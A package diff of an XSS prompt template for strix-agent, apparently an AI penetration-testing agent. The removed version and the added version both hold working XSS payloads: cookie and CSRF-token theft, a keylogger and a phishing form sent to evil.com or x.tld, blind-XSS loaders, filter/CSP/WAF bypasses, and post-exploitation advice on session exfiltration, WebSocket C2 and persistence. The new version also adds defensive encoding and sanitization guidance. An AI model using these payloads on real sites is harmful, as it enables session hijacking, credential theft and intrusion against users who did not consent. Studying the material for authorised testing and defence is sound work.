strix-agent 0.1.17__py3-none-any.whl → 0.1.19__py3-none-any.whl

strix/prompts/vulnerabilities/xss.jinja

@@ -1,221 +1,169 @@
 <xss_vulnerability_guide>
-<title>CROSS-SITE SCRIPTING (XSS) - ADVANCED EXPLOITATION</title>
+<title>CROSS-SITE SCRIPTING (XSS)</title>
 
-<critical>XSS leads to account takeover, data theft, and complete client-side compromise. Modern XSS requires sophisticated bypass techniques.</critical>
+<critical>XSS persists because context, parser, and framework edges are complex. Treat every user-influenced string as untrusted until it is strictly encoded for the exact sink and guarded by runtime policy (CSP/Trusted Types).</critical>
+
+<scope>
+- Reflected, stored, and DOM-based XSS across web/mobile/desktop shells
+- Multi-context injections: HTML, attribute, URL, JS, CSS, SVG/MathML, Markdown, PDF
+- Framework-specific sinks (React/Vue/Angular/Svelte), template engines, and SSR/ISR
+- CSP/Trusted Types interactions, bypasses, and gadget-based execution
+</scope>
+
+<methodology>
+1. Identify sources (URL/query/hash/referrer, postMessage, storage, WebSocket, service worker messages, server JSON) and trace to sinks.
+2. Classify sink context: HTML node, attribute, URL, script block, event handler, JavaScript eval-like, CSS, SVG foreignObject.
+3. Determine current defenses: output encoding, sanitizer, CSP, Trusted Types, DOMPurify config, framework auto-escaping.
+4. Craft minimal payloads per context; iterate with encoding/whitespace/casing/DOM mutation variants; confirm with observable side effects beyond alert.
+</methodology>
 
 <injection_points>
-- URL parameters: ?search=, ?q=, ?name=
-- Form inputs: text, textarea, hidden fields
-- Headers: User-Agent, Referer, X-Forwarded-For
-- Cookies (if reflected)
-- File uploads (filename, metadata)
-- JSON endpoints: {% raw %}{"user":"<payload>"}{% endraw %}
-- postMessage handlers
-- DOM properties: location.hash, document.referrer
-- WebSocket messages
-- PDF/document generators
+- Server render: templates (Jinja/EJS/Handlebars), SSR frameworks, email/PDF renderers
+- Client render: innerHTML/outerHTML/insertAdjacentHTML, template literals, dangerouslySetInnerHTML, v-html, $sce.trustAsHtml, Svelte {@html}
+- URL/DOM: location.hash/search, document.referrer, base href, data-* attributes
+- Events/handlers: onerror/onload/onfocus/onclick and JS: URL handlers
+- Cross-context: postMessage payloads, WebSocket messages, local/sessionStorage, IndexedDB
+- File/metadata: image/SVG/XML names and EXIF, office documents processed server/client
 </injection_points>
 
-<basic_detection>
-<reflection_testing>
-Simple: <random123>
-HTML: <h1>test</h1>
-Script: <script>alert(1)</script>
-Event: <img src=x onerror=alert(1)>
-Protocol: javascript:alert(1)
-</reflection_testing>
-
-<encoding_contexts>
-- HTML: <>&"'
-- Attribute: "'<>&
-- JavaScript: "'\/\n\r\t
-- URL: %3C%3E%22%27
-- CSS: ()'";{}
-</encoding_contexts>
-</basic_detection>
-
-<filter_bypasses>
-<tag_event_bypasses>
-<svg onload=alert(1)>
-<body onpageshow=alert(1)>
-<marquee onstart=alert(1)>
-<details open ontoggle=alert(1)>
-<audio src onloadstart=alert(1)>
-<video><source onerror=alert(1)>
-<select autofocus onfocus=alert(1)>
-<textarea autofocus>/*</textarea><svg/onload=alert(1)>
-<keygen autofocus onfocus=alert(1)>
-<frameset onload=alert(1)>
-</tag_event_bypasses>
-
-<string_bypass>
-- Concatenation: 'al'+'ert'
-- Comments: /**/alert/**/
-- Template literals: `ale${`rt`}`
-- Unicode: \u0061lert
-- Hex: \x61lert
-- Octal: \141lert
-- HTML entities: &apos;alert&apos;
-- Double encoding: %253Cscript%253E
-- Case variation: <ScRiPt>
-</string_bypass>
-
-<parentheses_bypass>
-alert`1`
-setTimeout`alert\x281\x29`
-[].map.call`1${alert}2`
-onerror=alert;throw 1
-onerror=alert,throw 1
-onerror=alert(1)//
-</parentheses_bypass>
-
-<keyword_bypass>
-- Proxy: window['al'+'ert']
-- Base64: atob('YWxlcnQ=')
-- Hex: eval('\x61\x6c\x65\x72\x74')
-- Constructor: [].constructor.constructor('alert(1)')()
-- JSFuck: [][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]...
-</keyword_bypass>
-</filter_bypasses>
+<context_rules>
+- HTML text: encode < > & " '
+- Attribute value: encode " ' < > & and ensure attribute quoted; avoid unquoted attributes
+- URL/JS URL: encode and validate scheme (allowlist https/mailto/tel); disallow javascript/data
+- JS string: escape quotes, backslashes, newlines; prefer JSON.stringify
+- CSS: avoid injecting into style; sanitize property names/values; beware url() and expression()
+- SVG/MathML: treat as active content; many tags execute via onload or animation events
+</context_rules>
+
+<advanced_detection>
+<differential_responses>
+- Compare responses with/without payload; normalize by length/ETag/digest; observe DOM diffs with MutationObserver
+- Time-based userland probes: setTimeout gating to detect execution without visible UI
+</differential_responses>
+
+<multi_channel>
+- Repeat tests across REST, GraphQL, WebSocket, SSE, Service Workers, and background sync; protections diverge per channel
+</multi_channel>
+</advanced_detection>
 
 <advanced_techniques>
 <dom_xss>
-- Sinks: innerHTML, document.write, eval, setTimeout
-- Sources: location.hash, location.search, document.referrer
-- Example: element.innerHTML = location.hash
-- Exploit: #<img src=x onerror=alert(1)>
+- Sources: location.* (hash/search), document.referrer, postMessage, storage, service worker messages
+- Sinks: innerHTML/outerHTML/insertAdjacentHTML, document.write, setAttribute, setTimeout/setInterval with strings, eval/Function, new Worker with blob URLs
+- Example vulnerable pattern:
+{% raw %}
+const q = new URLSearchParams(location.search).get('q');
+results.innerHTML = `<li>${q}</li>`;
+{% endraw %}
+Exploit: {% raw %}?q=<img src=x onerror=fetch('//x.tld/'+document.domain)>{% endraw %}
 </dom_xss>
 
 <mutation_xss>
-<noscript><p title="</noscript><img src=x onerror=alert(1)>">
-<form><button formaction=javascript:alert(1)>
+- Leverage parser repairs to morph safe-looking markup into executable code (e.g., noscript, malformed tags)
+- Payloads:
+{% raw %}<noscript><p title="</noscript><img src=x onerror=alert(1)>
+<form><button formaction=javascript:alert(1)>{% endraw %}
 </mutation_xss>
 
-<polyglot_xss>
-jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
-</polyglot_xss>
-
-<csp_bypasses>
-- JSONP endpoints: <script src="//site.com/jsonp?callback=alert">
-- AngularJS: {% raw %}{{constructor.constructor('alert(1)')()}}{% endraw %}
-- Script gadgets in allowed libraries
-- Base tag injection: <base href="//evil.com/">
-- Object/embed: <object data="data:text/html,<script>alert(1)</script>">
-</csp_bypasses>
+<template_injection>
+- Server or client templates evaluating expressions (AngularJS legacy, Handlebars helpers, lodash templates)
+- Example (AngularJS legacy): {% raw %}{{constructor.constructor('fetch(`//x.tld?c=`+document.cookie)')()}}{% endraw %}
+</template_injection>
+
+<csp_bypass>
+- Weak policies: missing nonces/hashes, wildcards, data: blob: allowed, inline events allowed
+- Script gadgets: JSONP endpoints, libraries exposing function constructors, import maps or modulepreload lax policies
+- Base tag injection to retarget relative script URLs; dynamic module import with allowed origins
+- Trusted Types gaps: missing policy on custom sinks; third-party introducing createPolicy
+</csp_bypass>
+
+<trusted_types>
+- If Trusted Types enforced, look for custom policies returning unsanitized strings; abuse policy whitelists
+- Identify sinks not covered by Trusted Types (e.g., CSS, URL handlers) and pivot via gadgets
+</trusted_types>
+
+<polyglot_minimal>
+- Keep a compact set tuned per context:
+HTML node: {% raw %}<svg onload=alert(1)>{% endraw %}
+Attr quoted: {% raw %}" autofocus onfocus=alert(1) x="{% endraw %}
+Attr unquoted: {% raw %}onmouseover=alert(1){% endraw %}
+JS string: {% raw %}"-alert(1)-"{% endraw %}
+URL: {% raw %}javascript:alert(1){% endraw %}
+</polyglot_minimal>
 </advanced_techniques>
 
-<exploitation_payloads>
-<cookie_theft>
-<script>fetch('//evil.com/steal?c='+document.cookie)</script>
-<img src=x onerror="this.src='//evil.com/steal?c='+document.cookie">
-new Image().src='//evil.com/steal?c='+document.cookie
-</cookie_theft>
-
-<keylogger>
-document.onkeypress=e=>fetch('//evil.com/key?k='+e.key)
-</keylogger>
-
-<phishing>
-document.body.innerHTML='<form action=//evil.com/phish><input name=pass><input type=submit></form>'
-</phishing>
-
-<csrf_token_theft>
-fetch('/api/user').then(r=>r.text()).then(d=>fetch('//evil.com/token?t='+d.match(/csrf_token":"([^"]+)/)[1]))
-</csrf_token_theft>
-
-<webcam_mic_access>
-navigator.mediaDevices.getUserMedia({video:true}).then(s=>...)
-</webcam_mic_access>
-</exploitation_payloads>
+<frameworks>
+<react>
+- Primary sink: dangerouslySetInnerHTML; secondary: setting event handlers or URLs from untrusted input
+- Bypass patterns: unsanitized HTML through libraries; custom renderers using innerHTML under the hood
+- Defense: avoid dangerouslySetInnerHTML; sanitize with strict DOMPurify profile; treat href/src as data, not HTML
+</react>
+
+<vue>
+- Sink: v-html and dynamic attribute bindings; server-side rendering hydration mismatches
+- Defense: avoid v-html with untrusted input; sanitize strictly; ensure hydration does not re-interpret content
+</vue>
+
+<angular>
+- Legacy expression injection (pre-1.6); $sce trust APIs misused to whitelist attacker content
+- Defense: never trustAsHtml for untrusted input; use bypassSecurityTrust only for constants
+</angular>
+
+<svelte>
+- Sink: {@html} and dynamic attributes
+- Defense: never pass untrusted HTML; sanitize or use text nodes
+</svelte>
+
+<markdown_richtext>
+- Markdown renderers often allow HTML passthrough; plugins may re-enable raw HTML
+- Sanitize post-render; forbid inline HTML or restrict to safe whitelist; remove dangerous URI schemes
+</markdown_richtext>
 
 <special_contexts>
-<pdf_generation>
-- JavaScript in links: <a href="javascript:app.alert(1)">
-- Form actions: <form action="javascript:...">
-</pdf_generation>
-
-<email_clients>
-- Limited tags: <a>, <img>, <style>
-- CSS injection: <style>@import'//evil.com/css'</style>
-</email_clients>
-
-<markdown>
-[Click](javascript:alert(1))
-![a](x"onerror="alert(1))
-</markdown>
-
-<react_vue>
-- dangerouslySetInnerHTML={% raw %}{{__html: payload}}{% endraw %}
-- v-html directive bypass
-</react_vue>
-
-<file_upload_xss>
-- SVG: <svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"/>
-- HTML files
-- XML with XSLT
-- MIME type confusion
-</file_upload_xss>
+<emails>
+- Most clients strip scripts but allow CSS/remote content; use CSS/URL tricks only if relevant; avoid assuming JS execution
+</emails>
+
+<pdf_and_docs>
+- PDF engines may execute JS in annotations or links; test javascript: in links and submit actions
+</pdf_and_docs>
+
+<file_uploads>
+- SVG/HTML uploads served with text/html or image/svg+xml can execute inline; verify content-type and Content-Disposition: attachment
+- Mixed MIME and sniffing bypasses; ensure X-Content-Type-Options: nosniff
+</file_uploads>
 </special_contexts>
 
-<blind_xss>
-<detection>
-- Out-of-band callbacks
-- Service workers for persistence
-- Polyglot payloads for multiple contexts
-</detection>
-
-<payloads>
-'"><script src=//evil.com/blindxss.js></script>
-'"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Ii8vZXZpbC5jb20veHNzLmpzIjtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw onerror=eval(atob(this.id))>
-</payloads>
-</blind_xss>
-
-<waf_bypasses>
-<encoding>
-- HTML: &#x3C;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3E;
-- URL: %3Cscript%3E
-- Unicode: \u003cscript\u003e
-- Mixed: <scr\x69pt>
-</encoding>
-
-<obfuscation>
-<a href="j&#x61;vascript:alert(1)">
-<img src=x onerror="\u0061\u006C\u0065\u0072\u0074(1)">
-<svg/onload=eval(atob('YWxlcnQoMSk='))>
-</obfuscation>
-
-<browser_bugs>
-- Chrome: <svg><script>alert&lpar;1&rpar;
-- Firefox specific payloads
-- IE/Edge compatibility
-</browser_bugs>
-</waf_bypasses>
-
-<impact_demonstration>
-1. Account takeover via cookie/token theft
-2. Defacement proof
-3. Keylogging demonstration
-4. Internal network scanning
-5. Cryptocurrency miner injection
-6. Phishing form injection
-7. Browser exploit delivery
-8. Session hijacking
-9. CSRF attack chaining
-10. Admin panel access
-</impact_demonstration>
+<post_exploitation>
+- Session/token exfiltration: prefer fetch/XHR over image beacons for reliability; bind unique IDs to correlate victims
+- Real-time control: WebSocket C2 that evaluates only a strict command set; avoid eval when demonstrating
+- Persistence: service worker registration where allowed; localStorage/script gadget re-injection in single-page apps
+- Impact: role hijack, CSRF chaining, internal port scan via fetch, content scraping, credential phishing overlays
+</post_exploitation>
+
+<validation>
+1. Provide minimal payload and context (sink type) with before/after DOM or network evidence.
+2. Demonstrate cross-browser execution where relevant or explain parser-specific behavior.
+3. Show bypass of stated defenses (sanitizer settings, CSP/Trusted Types) with proof.
+4. Quantify impact beyond alert: data accessed, action performed, persistence achieved.
+</validation>
+
+<false_positives>
+- Reflected content safely encoded in the exact context
+- CSP with nonces/hashes and no inline/event handlers; Trusted Types enforced on sinks; DOMPurify in strict mode with URI allowlists
+- Scriptable contexts disabled (no HTML pass-through, safe URL schemes enforced)
+</false_positives>
 
 <pro_tips>
-1. Test in all browsers - payloads vary
-2. Check mobile versions - different parsers
-3. Use automation for blind XSS
-4. Chain with other vulnerabilities
-5. Focus on impact, not just alert(1)
-6. Test all input vectors systematically
-7. Understand the context deeply
-8. Keep payload library updated
-9. Monitor CSP headers
-10. Think beyond script tags
+1. Start with context classification, not payload brute force.
+2. Use DOM instrumentation to log sink usage; it reveals unexpected flows.
+3. Keep a small, curated payload set per context and iterate with encodings.
+4. Validate defenses by configuration inspection and negative tests.
+5. Prefer impact-driven PoCs (exfiltration, CSRF chain) over alert boxes.
+6. Treat SVG/MathML as first-class active content; test separately.
+7. Re-run tests under different transports and render paths (SSR vs CSR vs hydration).
+8. Test CSP/Trusted Types as features: attempt to violate policy and record the violation reports.
 </pro_tips>
 
-<remember>Modern XSS is about bypassing filters, CSP, and WAFs. Focus on real impact - steal sessions, phish credentials, or deliver exploits. Simple alert(1) is just the beginning.</remember>
+<remember>Context + sink decide execution. Encode for the exact context, verify at runtime with CSP/Trusted Types, and validate every alternative render path. Small payloads with strong evidence beat payload catalogs.</remember>
 </xss_vulnerability_guide>